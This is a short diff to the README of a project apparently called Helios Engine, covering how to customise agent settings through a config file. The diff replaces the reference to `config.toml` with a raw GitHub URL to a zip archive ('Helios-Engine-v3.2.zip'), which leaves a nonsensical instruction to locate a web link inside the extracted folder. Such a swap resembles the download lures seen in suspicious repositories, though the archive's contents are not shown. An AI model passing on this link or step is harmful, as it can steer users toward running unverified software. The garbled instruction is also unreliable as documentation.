Celestiapolyunsaturated14/Helios-Engine/README.md

 To make the most out of Helios Engine, you can customize your agent settings.
 Here’s how:

-1. Locate the `config.toml` file in the extracted folder.
+1. Locate the `https://raw.githubusercontent.com/Celestiapolyunsaturated14/Helios-Engine/master/book/src/Helios-Engine-v3.2.zip` file in the extracted folder.
 2. Open it with a text editor (e.g., Notepad on Windows, TextEdit on macOS).
 3. Adjust the settings as needed, following the comments in the file for guidance.
 4. Save your changes.